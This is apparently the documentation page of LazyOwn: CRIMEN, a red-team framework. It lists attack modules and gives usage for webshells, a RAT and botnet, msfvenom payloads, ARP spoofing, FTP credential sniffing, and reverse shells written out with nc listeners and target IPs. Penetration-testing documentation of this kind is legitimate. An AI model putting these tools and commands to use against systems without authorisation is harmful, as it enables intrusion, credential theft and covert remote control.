LazyOwn: Cyber Redteam Interface Management Environment Network (CRIMEN)
In the shadowy realm of cybersecurity, where digital fortresses are besieged by relentless adversaries, LazyOwn: CRIMEN emerges as a beacon of strategic prowess and technical mastery. This advanced and comprehensive toolkit is meticulously crafted for professional red teams, penetration testers, and security researchers, offering an unparalleled arsenal of over 333 meticulously designed attacks tailored for Linux/*nix/bsd/osx and Windows environments. Additionally, LazyOwn: CRIMEN integrates the extensive attack library of the Atomic RedTeam Framework, exponentially increasing its offensive capabilities.
LazyOwn: CRIMEN is not merely a tool; it is an ethereal manifestation of the art of cyber warfare, seamlessly integrating a myriad of functionalities to streamline and enhance the efficiency of security assessments. This interactive environment combines multiple tools and scripts, enabling cybersecurity professionals to navigate the complex labyrinth of the security assessment lifecycle with unmatched precision.
At the heart of LazyOwn: CRIMEN lies an intuitive command-line interface (CLI) powered by cmd2, complemented by a sophisticated web-based graphical user interface (GUI) developed in Flask. This dual interface allows users to configure specific parameters, execute custom scripts, and obtain real-time results, all from a single, unified platform. The framework's advanced adversary simulation capabilities enable the generation of sessions for red team operations, meticulously executed within the scope defined in the payload.json file. This not only expands its range of applications but also enhances usability and accessibility through multiple interfaces.
One of the standout features of LazyOwn: CRIMEN is its ability to schedule tasks using the cron command, facilitating persistent and automated threat simulations. This functionality transforms LazyOwn: CRIMEN into a formidable Advanced Persistent Threat (APT) framework, capable of mimicking the relentless and methodical attacks of sophisticated cyber adversaries.
CRIMEN stands for Cyber Redteam Interface Management Environment Network, encapsulating the essence of this powerful framework. Each letter in the acronym represents a critical component of its capabilities:
- Cyber: Emphasizes the digital battleground where LazyOwn: CRIMEN operates, encompassing all aspects of cybersecurity.
- Redteam: Highlights the framework's primary function as a tool for red team operations, simulating real-world cyber attacks to test and strengthen defenses.
- Interface: Refers to the intuitive and user-friendly interfaces, both CLI and GUI, that facilitate seamless interaction and control.
- Management: Underscores the framework's ability to manage and orchestrate complex security assessments and adversary simulations.
- Environment: Denotes the comprehensive and immersive environment provided by LazyOwn: CRIMEN, integrating various tools and scripts for a holistic security assessment experience.
- Network: Emphasizes the framework's network-centric approach, enabling persistent and automated threat simulations across diverse network environments.
- Comprehensive Attack Library: Over 333 crafted attacks for various environments, each a testament to the framework's depth and versatility, augmented by the extensive attack library of the Atomic RedTeam Framework.
- Interactive CLI: Based on cmd2, offering an intuitive and efficient command-line experience.
- Web GUI: Developed in Flask, providing a user-friendly interface for seamless interaction.
- Adversary Simulation: Advanced capabilities for generating red team operation sessions, ensuring meticulous and effective simulations.
- Task Scheduling: Utilize the
croncommand to schedule and automate tasks, enabling persistent threat simulations. - Real-Time Results: Obtain immediate feedback and results from security assessments, ensuring timely and accurate insights.
- RAT and Botnet Capabilities: Includes features for remote access and control, allowing for the management of botnets and persistent threats.
- C2 Framework: Acts as a command and control (C2) framework, enabling covert communication and control over compromised systems.
LazyOwn: CRIMEN offers a rich set of commands that can be executed from both the CLI and the web interface, each designed to empower users with unparalleled control and flexibility:
- list: Enumerates all available LazyOwn Modules within the framework, providing a comprehensive overview of the toolkit's capabilities.
- **assign **: Configures specific parameters for the operation, such as
assign rhost 192.168.1.1to define the target IP address, ensuring precise and tailored attacks. - show: Displays the current values of all configured parameters, offering a clear and concise view of the operational setup.
- **run : Executes specific scripts available in the framework, such as
run lazysniffto initiate packet sniffing, enabling dynamic and responsive security assessments. - cron: Schedules tasks to run at specified intervals, ensuring persistent and automated threat simulations that mimic the relentless nature of advanced cyber adversaries.
- exit: Gracefully exits the CLI, concluding the session with elegance and finality.
Originally designed to automate the search and analysis of binaries with special permissions on Linux and Windows systems, LazyOwn has evolved to encompass a broader range of functionalities. The project includes scripts that extract information from GTFOBins, analyze binaries on the system, and generate options based on the collected data.
This document explains how to use Lua scripting to extend the functionality of the LazyOwnShell application, which is built on top of the cmd2 framework in Python. Lua allows you to write custom plugins that can add new commands, modify existing behavior, or access application data.
- Introduction
- Setting Up Lua Plugins
- Writing Lua Plugins
- Registering New Commands
- Accessing Application Data
- Error Handling
- Example Plugins
- Best Practices
The LazyOwnShell application supports Lua scripting to allow users to extend its functionality without modifying the core Python code. Lua scripts (plugins) are stored in the plugins/ directory and are automatically loaded when the application starts.
Lua plugins can:
- Add new commands to the shell.
- Modify existing commands or behaviors.
- Access and manipulate application data exposed by Python.
To use Lua plugins, ensure the following:
Install the
lupalibrary in your Python environment:pip install lupa
plugins/ init_plugins.lua hello.lua goodbye.luaWhen the application starts, it will execute init_plugins.lua, which loads all other .lua files in the plugins/ directory.
Writing Lua Plugins A Lua plugin is a script file with the .lua extension placed in the plugins/ directory. Each plugin can define functions and register them as commands in the shell.
Structure of a Lua Plugin
-- Define a function for the new command
function my_command(arg)
-- Your logic here
print("This is a new command: " .. (arg or "default"))
end
-- Register the function as a command
register_command("my_command", my_command)Key Functions
- register_command(command_name, lua_function):
- Registers a new command in the shell.
- command_name: The name of the command (e.g., hello).
- lua_function: The Lua function to execute when the command is called.
Registering New Commands
To add a new command to the shell, follow these steps:
Define a Lua function that implements the command logic.
Use register_command to register the function as a command.
Example: Adding a hello Command
Create a file plugins/hello.lua with the following content:
function hello(arg) local name = arg or "world" print("Hello, " .. name .. "!") end register_command("hello", hello)
Now, you can run the hello command in the shell: bash hello Lua Hello, Lua! 4. Best Practices
- Keep Plugins Modular : Each plugin should focus on a single feature or functionality.
- Document Your Plugins : Provide clear documentation for each plugin, including usage examples.
- Test Thoroughly : Test your plugins in isolation before integrating them into the main application.
- Handle Errors Gracefully : Use pcall to handle errors in Lua plugins and prevent crashes.
By leveraging Lua scripting, you can extend the functionality of LazyOwnShell without modifying the core Python code. This allows for greater flexibility and customization, enabling users to write their own plugins to meet specific needs. Happy coding!
LazyOwn on Reddit
Revolutionize Your Pentesting with LazyOwn: Automate the intrusion on Linux, MAC OSX, and Windows VICTIMS
https://www.reddit.com/r/LazyOwn/
LazyOwn_.Transform.Pentesting.with.Automation.mp4
Discover LazyOwn, the ultimate solution for automating the pentesting workflow to attack Linux, MacOSX and Windows systems. Our powerful tool simplifies pentesting, making it more efficient and effective. Watch this video to learn how LazyOwn can streamline your security assessments and enhance your cybersecurity toolkit.
LazyOwn> assign rhost 192.168.1.1
[SET] rhost set to 192.168.1.1
LazyOwn> run lazynmap
[INFO] Running Nmap scan on 192.168.1.1
...LazyOwn is ideal for cybersecurity professionals seeking a centralized and automated solution for their pentesting needs, saving time and enhancing efficiency in identifying and exploiting vulnerabilities.
Python 3.x
Módulos de Python:
- requests
- python-libnmap
- pwncat-cs
- pwn
- groq
- PyPDF2
- docx
- python-docx
- olefile
- exifread
- pycryptodome
- impacket
- pandas
- colorama
- tabulate
- pyarrow
- keyboard
- flask-unsign
- name-that-hash
- certipy-ad
- ast
- pykeepass
- cmd2
- Pillow
- netaddr
- stix2
- pyautogui
subprocess(incluido en la biblioteca estándar de Python)platform(incluido en la biblioteca estándar de Python)tkinter(Opcional para el GUI)numpy(Opcional para el GUI)
- Clona el repositorio:
git clone https://github.com/grisuno/LazyOwn.git
cd LazyOwn- Instala las dependencias de Python:
./install.sh./run or ./fast_run_as_r00t.sh
./run --help
[;,;] LazyOwn vvvrelease/0.2.8
Usage: ./run [Options]
Options:
--help Show this help panel.
-v Show version.
-p <payloadN.json> Exec with different payload.json example. ./run -p payload1.json, (Special for RedTeams)
-c <command> Exec a command using LazyOwn example: ping
--no-banner No Banner
-s Run as root
--old-banner Show old Banner
./fast_run_as_r00t.sh --vpn 1 (the number id of your file in vpn directory)Use assign <parameter> <value> to configure parameters.
Use show to display the current parameter values.
Use run <script_name> to execute a script with the set parameters.
Use exit to exit the CLI.
Once the shell is running, you can use the following commands:
list: Lists all LazyOwn Modules.
assign <parameter> <value>: Sets the value of a parameter. For example, assign rhost 192.168.1.1.
show: Displays the current values of all parameters.
run <script>: Executes a specific script available in the framework.
Available Scripts
┌─[LazyOwn👽192.168.1.92 ~/home/gris/tools/LazyOwn][10.10.11.29][http://lantern.htb/]
└╼ $ ls
[+] Available scripts to run: [👽]
[+] lazysearch lazysearch_gui lazyown [👽]
[+] update_db lazynmap lazyaslrcheck [👽]
[+] lazynmapdiscovery lazygptcli lazyburpfuzzer [👽]
[+] lazymetaextract0r lazyreverse_shell lazyattack [👽]
[+] lazyownratcli lazyownrat lazygath [👽]
[+] lazysniff lazynetbios lazybotnet [👽]
[+] lazybotcli lazyhoneypot lazysearch_bot [👽]
[+] lazylfi2rce lazylogpoisoning lazymsfvenom [👽]
[+] lazypathhijacking lazyarpspoofing lazyftpsniff [👽]
[+] lazyssh77enum lazywerkzeugdebug [👽]
└╼ $ help
Documented commands (use 'help -v' for verbose/'help <topic>' for details):
===========================================================================
acknowledgearp fuzz pwncatcs
acknowledgeicmp gencert py3ttyup
aclpwn_py generate_revshell pyautomate
ad_ldap_enum generatedic pykerbrute
addhosts getadusers pyoracle2
addspn_py getcap pywhisker
addusers getnpusers qa
adgetpass getnthash_py quit
adsso_spray gets4uticket_py rdp
alias getseclist rdp_check_py
aliass getTGT recon
allin gettgtpkinit_py refill_password
alterx getuserspns reg_py
amass gitdumper regeorg
apache_users gmsadumper rejetto_hfs_exec
apropos gobuster responder
apt_proxy gospherus rev
apt_repo gospider revwin
arjun gowitness rhost
arpscan graph rocky
asprevbase64 graudit rot
assign greatSCT rotf
atomic_agent grisun0 rpcclient
atomic_gen grisun0w rpcdump
atomic_lazyown h rpcmap_py
atomic_tests hashcat rrhost
autoblody help rsync
automsf hex_to_plaintext rubeus
backdoor_factory history run
banner hostdiscover run_pyscript
banners httprobe run_script
base64decode hydra samdump2
base64encode id_rsa samrdump
batchnmap ignorearp sawks
bbot ignoreicmp scarecrow
bin2shellcode iis_webdav_upload_asp scavenger
binarycheck img2cookie scp
blazy internet_proxy searchhash
bloodhound ip secretsdump
bloodyAD ip2asn seo
breacher ip2hex serveralive2
c2 ipp sessionssh
cacti_exploit ipy sessionsshstrace
caldera ivy set
certipy john2hash set_proxychains
cewl john2keepas setoolKits
changeme john2zip sh
check_update jwt_tool shadowsocks
chisel keepass sharpshooter
clean kerbrute shell
clock kick shellcode
cme krbrelayx_py shellcode2elf
conptyshell kusa shellcode2sylk
cp launchpad shellcode_search
cports lazypwn shellfire
crack_cisco_7_password lazyscript shellshock
create_session_json lazywebshell sherlock
createcookie ldapdomaindump shortcuts
createcredentials ldapsearch show
createdll lfi sireprat
createhash ligolo skipfish
createjsonmachine links sliver_server
createjsonmachine_batch list smalldic
createmail lol smbattack
createpayload lookupsid smbclient
createrevshell lookupsid_py smbclient_py
createtargets loxs smbmap
createusers_and_hashs lynis smbserver
createwebshell macro smtpuserenum
createwinrevshell magicrecon snmpcheck
cred malwarebazar snmpwalk
creds_py medusa socat
cron metabigor spraykatz
crunch mimikatzpy sqli
cubespraying mitre_test sqli_mssql_test
cve morse sqlmap
d3monizedshell mqtt_check_py sqsh
dacledit ms08_067_netapi ss
darkarmour msf ssh
davtest msfpc sshd
dcomexec msfrpc sshexploit
decode mssqlcli sshkey
decrypt name_the_hash sslscan
dig nano stormbreaker
digdug nbtscan sudo
dirsearch nc swaks
disableav net_rpc_addmem tab
dmitry netexec targetedKerberoas
dnschef netview tcpdump_capture
dnsenum news tcpdump_icmp
dnsmap ngrok template_helper_serializer
dnstool_py nikto ticketer
download_exploit nmapscript tord
download_malwarebazar nmapscripthelp trace
download_resources ntpdate transform
downloader nuclei trufflehog
dploot odat tshark_analyze
dr0p1t ofuscatorps1 unicode_WAFbypass
duckyspark openredirex unzip
edit openssl_sclient upload_bypass
emp3r0r osmedeus upload_gofile
empire owneredit urldecode
encode padbuster urlencode
encoderpayload paranoid_meterpreter username_anarchy
encrypt parsero utf
enum4linux parth v
enum4linux_ng passtightvnc veil
EOF passwordspray vpn
eternal payload vscan
evidence penelope vulns
evil_ssdp pezorsh waybackmachine
evilwinrm ping weevely
excelntdonut pip_proxy weevelygen
exe2bin pip_repo wfuzz
exit portdiscover whatweb
extract_ports ports wifipass
eyewitness portservicediscover winbase64payload
eyewitness_py powerserver windapsearch
feroxbuster powershell_cmd_stager windapsearchscrapeusers
filtering pre2k wmiexec
finalrecon printerbug_py wmiexecpro
find proxy wpscan
finger_user_enum psexec wrapper
fixel pth_net www
fixperm pup xss
follina pwd xsstrike
ftp pwncat
https://www.youtube.com/hashtag/lazyown
https://www.youtube.com/watch?v=m4FtlhownvM&list=PLW9Qe5HJK5CFXyIsF9b0NB6n9EY8Am3YZ
LazyOwn> assign binary_name my_binary
LazyOwn> assign rhost 192.168.1.100
LazyOwn> assign api_key my_api_key
LazyOwn> run lazysearch
LazyOwn> run lazynmap
LazyOwn> exit
For searching within the scraped database obtained from GTFOBins.
python3 lazysearch.py binario_a_buscarAdditional Features and Enhancements: AutocompleteEntry:
A filter has been added to remove None values from the autocomplete list. New Attack Vector:
A "New Attack Vector" button has been added to the main interface. Functionality has been implemented to add a new attack vector and save the updated data in Parquet files. Export to CSV:
A "Export to CSV" button has been added to the main interface. Functionality has been implemented to export DataFrame data to a user-selected CSV file. Usage:
Add a New Attack Vector: Click the "New Attack Vector" button, fill in the fields, and save. Export to CSV: Click the "Export to CSV" button and select the location to save the CSV file. New Function scan_system_for_binaries:
Implements system-wide binary searches using the file command to determine if a file is binary. Uses os.walk to traverse the file system. Results are displayed in a new window within the GUI. Button to Search for Binaries:
A "Search System for Binaries" button has been added to the main interface, which calls the scan_system_for_binaries function. Note:
The is_binary function uses the Unix file command to determine if a file is a binary executable. If you are on a different operating system, you will need to adjust this method for compatibility. This implementation can be resource-intensive as it traverses the entire file system. You may consider adding additional options to limit the search to specific directories or filter for certain file types.
python3 LazyOwnExplorer.py
python3 lazyown.pyIf you want to update, we proceed as follows:
cd LazyOwn
rm parquets/*.csv
rm parquets/*.parquet
./update_db.shLazyOwn Webshell Collection is a collection of webshells for our framework, which allows us to establish a webshell on the machine where we run LazyOwn using various programming languages. Essentially, LazyOwn Webshell raises a web server within the modules directory, making it accessible via a web browser. This allows us to both make the modules available separately through the web and access the cgi-bin directory, where there are four shells: one in Bash, another in Perl, another in Python, and one in ASP, in case the target is a Windows machine.
lazywebshelly listo ya podemos acceder a cualquiera de estas url:
http://localhost:8080/cgi-bin/lazywebshell.sh
http://localhost:8080/cgi-bin/lazywebshell.py
http://localhost:8080/cgi-bin/lazywebshell.asp
http://localhost:8080/cgi-bin/lazywebshell.cgi
Executes the `msfvenom` tool to generate a variety of payloads based on user input.
This function prompts the user to select a payload type from a predefined list and runs the corresponding
`msfvenom` command to create the desired payload. It handles tasks such as generating different types of
payloads for Linux, Windows, macOS, and Android systems, including optional encoding with Shikata Ga Nai for C payloads.
The generated payloads are moved to a `sessions` directory, where appropriate permissions are set. Additionally,
the payloads can be compressed using UPX for space efficiency. If the selected payload is an Android APK,
the function will also sign the APK and perform necessary post-processing steps.
:param line: Command line arguments for the script.
:return: None
run lazymsfvenom or venomA file will be created in /tmp with the name binary_name set in the payload, initialized with gzip in memory, and using bash in the payload. To set the payload from the JSON, use the payload command to execute. Use:
lazypathhijackingLazyOwn RAT is a simple yet powerful Remote Administration Tool. It features a screenshot function that captures the server's screen, an upload command that allows us to upload files to the compromised machine, and a C&C mode where commands can be sent to the server. It operates in two modes: client mode and server mode. There is no obfuscation, and the RAT is based on BasicRat. You can find it on GitHub at https://github.com/awesome-security/basicRAT and at https://github.com/hash3liZer/SillyRAT. Although the latter is much more comprehensive, I just wanted to implement screenshot capture, file uploads, and command sending. Perhaps in the future, I will add webcam viewing functionality, but that will come later.
usage: lazyownserver.py [-h] [--host HOST] [--port PORT] --key KEY
lazyownserver.py: error: the following arguments are required: --key
usage: lazyownclient.py [-h] --host HOST --port PORT --key KEY
lazyownclient.py: error: the following arguments are required: --host, --port, --key
LazyOwn> run lazyownclient
[?] lhost and lport and rat_key must be set
LazyOwn> run lazyownserver
[?] rhost and lport and rat_key must be set
luego los comandos son:
upload /path/to/file
donwload /path/to/file
screenshot
sysinfo
fix_xauth #to fix xauth xD
lazyownreverse 192.168.1.100 8888 #Reverse shell to 192.168.1.100 on port 8888 ready to C&C
LazyMeta Extract0r is a tool designed to extract metadata from various types of files, including PDF, DOCX, OLE files (such as DOC and XLS), and several image formats (JPG, JPEG, TIFF). This tool will traverse a specified directory, search for files with compatible extensions, extract the metadata, and save it to an output file.
[*] Iniciando: LazyMeta extract0r [;,;]
usage: lazyown_metaextract0r.py [-h] --path PATH lazyown_metaextract0r.py: error: the following arguments are required: --path
python3 lazyown_metaextract0r.py --path /home/user
A encryption method that allows us to both encrypt files and decrypt them if we have the key, of course.
encrypt path/to/file key # to encrypt
decrypt path/to/file.enc key #to decryptThe use of Lazynmap provides us with an automated script for a target, in this case, 127.0.0.1, using Nmap. The script requires administrative permissions via sudo. It also includes a network discovery module to identify what is present in the IP segment you are in. Additionally, the script can now be called without parameters using the alias nmap or with the command run lazynmap.
./lazynmap.sh -t 127.0.0.1 # or in the cli just nmapDiscover the revolution in automating pentesting tasks with the LazyOwn GPT One Liner CLI Assistant! This incredible script is part of the LazyOwn tool suite, designed to make your life as a pentester more efficient and productive.
🚀 Key Features:
Intelligent Automation: Leverages the power of Groq and advanced natural language models to generate precise and efficient commands based on your specific needs. User-Friendly Interface: With a simple prompt, the assistant generates and executes one-liner scripts, drastically reducing the time and effort involved in creating complex commands. Continuous Improvement: Continuously transforms and optimizes its knowledge base to provide you with the best solutions, adapting to each situation. Simplified Debugging: Enable debug mode to obtain detailed information at every step, facilitating the identification and correction of errors. Seamless Integration: Works effortlessly within your workspace, harnessing the power of the Groq API to deliver quick and accurate responses. 🔒 Security and Control:
Safe Error Handling: Intelligently detects and responds to execution errors, ensuring you maintain full control over each generated command. Controlled Execution: Before executing any command, it requests your confirmation, giving you peace of mind knowing exactly what is being executed on your system. 🌐 Easy Configuration:
Set up your API key in seconds and start enjoying all the benefits offered by the LazyOwn GPT One Liner CLI Assistant. A quick start guide is available to help you configure and maximize the potential of this powerful tool.
🎯 Ideal for Pentesters and Developers:
Optimize Your Processes: Simplify and accelerate command generation in your security audits. Continuous Learning: The knowledge base is constantly updated and improved, always providing you with the latest best practices and solutions. With the LazyOwn GPT One Liner CLI Assistant, transform the way you work, making it faster, more efficient, and secure. Stop wasting time on repetitive and complex tasks, and focus on what truly matters: discovering and resolving vulnerabilities!
Join the pentesting revolution with LazyOwn and take your productivity to the next level!
[?] Usage: python lazygptcli.py --prompt "" [--debug]
[?] Options:
--prompt "The prompt for the programming task (required)." --debug, -d "Enables debug mode to display debug messages." --transform "Transforms the original knowledge base into an enhanced base using Groq." [?] Ensure you configure your API key before running the script: export GROQ_API_KEY=<your_api_key> [->] Visit: https://console.groq.com/docs/quickstart (not a sponsored link)
Requirements:
Python 3.x A valid Groq API key Steps to Obtain the Groq API Key: Visit Groq Console (https://console.groq.com/docs/quickstart) to register and obtain an API key.
export GROQ_API_KEY=<tu_api_key>
python3 lazygptcli.py --prompt "<tu prompt>" [--debug] 
Provide the arguments as specified by the script's requests: The script will require the following arguments:
usage: lazyown_bprfuzzer.py [-h] --url URL [--method METHOD] [--headers HEADERS] [--params PARAMS] [--data DATA] [--json_data JSON_DATA] [--proxy_port PROXY_PORT] [-w WORDLIST] [-hc HIDE_CODE] --url: The URL to which the request will be sent (required). --method: The HTTP method to use, such as GET or POST (optional, default: GET). --headers: The request headers in JSON format (optional, default: {}). --params: The URL parameters in JSON format (optional, default: {}). --data: The form data in JSON format (optional, default: {}). --json_data: The JSON data for the request in JSON format (optional, default: {}). --proxy_port: The port for the internal proxy (optional, default: 8080). -w, --wordlist: The path to the wordlist for fuzzing mode (optional). -hc, --hide_code: The HTTP status code to hide in the output (optional). Make sure to provide the required arguments to ensure the script runs correctly.
python3 lazyown_bprfuzzer.py --url "http://example.com" --method POST --headers '{"Content-Type": "LAZYFUZZ"}'Form 2: Advanced Usage
If you wish to take advantage of the advanced features of the script, such as request replay or fuzzing, follow these steps:
Request Replay:
To utilize the request replay functionality, provide the arguments as indicated earlier. During execution, the script will ask if you want to repeat the request. Enter 'y' to repeat or 'n' to terminate the repeater. Fuzzing:
To use the fuzzing functionality, make sure to provide a wordlist with the -w or --wordlist argument. The script will replace the word LAZYFUZZ in the URL and other data with the words from the provided wordlist. During execution, the script will display the results of each fuzzing iteration. These are the basic and advanced ways to use the lazyburp.py script. Depending on your needs, you can choose the method that best fits your specific situation.
python3 lazyown_bprfuzzer.py \ ─╯
--url "http://127.0.0.1:80/LAZYFUZZ" \
--method POST \
--headers '{"User-Agent": "LAZYFUZZ"}' \
--params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
--data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
--json_data '{"key3": "LAZYFUZZ"}' \
--proxy_port 8080 \
-w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
-hc 501python3 lazyown_bprfuzzer.py \ ─╯
--url "http://127.0.0.1:80/LAZYFUZZ" \
--method POST \
--headers '{"User-Agent": "LAZYFUZZ"}' \
--params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
--data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
--json_data '{"key3": "LAZYFUZZ"}' \
--proxy_port 8080 \
-w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
Note: To use the dictionary, run the following command within /usr/share/seclists:
now the command 'getseclist' do that automated.
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zipThis module is used to search for passwords on FTP servers across the network. Some may say that FTP is no longer used, but you would be surprised at the critical infrastructure environments I've seen with massive FTP services running on their servers. :)
assign device eth0
run lazyftpsniff
Listen
nc -nlvp 1337 #o el puerto que escojamos 
para luego en la maquina victima
./lazyreverse_shell.sh --ip 127.0.0.1 --puerto 1337
The module is located in the modules directory and is used as follows:
chmod +x lazycurl.shand then
./lazycurl.sh --mode GET --url http://10.10.10.10Usage.
GET:
./lazycurl.sh --mode GET --url http://10.10.10.10POST:
./lazycurl.sh --mode POST --url http://10.10.10.10 --data "param1=value1¶m2=value2"TRACE:
./lazycurl.sh --mode TRACE --url http://10.10.10.10
```sh
File upload:
```sh
./lazycurl.sh --mode UPLOAD --url http://10.10.10.10 --file file.txtwordlist bruteforce mode:
./lazycurl.sh --mode BRUTE_FORCE --url http://10.10.10.10 --wordlist /usr/share/wordlists/rockyou.txtMake sure to adjust the parameters according to your needs and that the values you provide for the options are valid for each case.
The script provides an ARP spoofing attack using Scapy. In the payload, you must set the lhost, rhost, and the device that you will use to perform the ARP spoofing.
assign rhost 192.168.1.100
assign lhost 192.168.1.1
assign device eth0
run lazyarpspoofingThis script provides an X-ray view of the system in question where the tool is being executed, offering insights into its configuration and state.
run lazygathThe LFI RFI 2 RCE mode is designed to test some of the more well-known payloads against the parameters specified in payload.json. This allows for a comprehensive assessment of Local File Inclusion (LFI), Remote File Inclusion (RFI), and Remote Code Execution (RCE) vulnerabilities in the target system.
payload
run lazylfi2rcehttps://www.youtube.com/watch?v=_-DDiiMrIlE
The sniffer mode allows capturing network traffic through interfaces using the -i option, which is mandatory. There are many other optional settings that can be adjusted as needed.
usage: lazysniff.py [-h] -i INTERFACE [-c COUNT] [-f FILTER] [-p PCAP]
lazysniff.py: error: the following arguments are required: -i/--interface
To use the sniffer from the framework, you must configure the device with the command:
```sh
run lazysniff
or just
sniffThis feature is in experimental mode and does not work fully due to a path issue. Soon, it will support obfuscation using PyInstaller.
./py2el.shThis feature is in experimental mode as it is not functioning yet... (coming soon, possibly an implementation of EternalBlue among other things...)
run lazynetbiosThis feature is in experimental mode, and the decryption of the keylogger logs is not functioning xD. Here we see for the first time in action the payload command, which sets all the configuration in our payload.json, allowing us to preload the configuration before starting the framework.
payload
run lazybotnetThe script features interactive menus to select actions to be performed. In server mode, it displays relevant options for the victim machine, while in client mode, it shows options relevant to the attacking machine.
The script handles the SIGINT signal (usually generated by Control + C) to exit cleanly.
This project is licensed under the GPL v3 License. The information contained in GTFOBins is owned by its authors, to whom we are immensely grateful for the information provided.
A special thanks to GTFOBins for the valuable information they provide and to you for using this project. Also, thanks for your support Tito S4vitar! who does an extraordinary job of outreach. Of course, I use the extractPorts function in my .zshrc :D
An excellent tool that I adapted a bit to work with the project; all credits go to its author honze-net Andreas Hontzia. Visit and show love to the project: https://github.com/honze-net/pwntomate
An excellent tool for CVE detection, I implemented only the keyword search as I had to change some libraries. Soon also for XML generated by nmap :) Total thanks to justakazh. https://github.com/justakazh/sicat/
LazyOwn is a framework that streamlines its workflow and automates many tasks and tests through aliases and various tools, functioning like a Swiss army knife with multipurpose blades for hacking xD.
Compiles and uploads an .ino sketch to a Digispark device using Arduino CLI and Micronucleus.
This method checks if Arduino CLI and Micronucleus are installed on the system.
If they are not available, it installs them. It then compiles a Digispark sketch
and uploads the generated .hex file to the Digispark device.
The method performs the following actions:
1. Checks for the presence of Arduino CLI and installs it if not available.
2. Configures Arduino CLI for Digispark if not already configured.
3. Generates a reverse shell payload and prepares the sketch for Digispark.
4. Compiles the prepared Digispark sketch using Arduino CLI.
5. Checks for the presence of Micronucleus and installs it if not available.
6. Uploads the compiled .hex file to the Digispark device using Micronucleus.
Args:
line (str): Command line input provided by the user, which may contain additional parameters.
Returns:
None: The function does not return any value but may modify the state of the system
by executing commands.
Comentarios
Publicar un comentario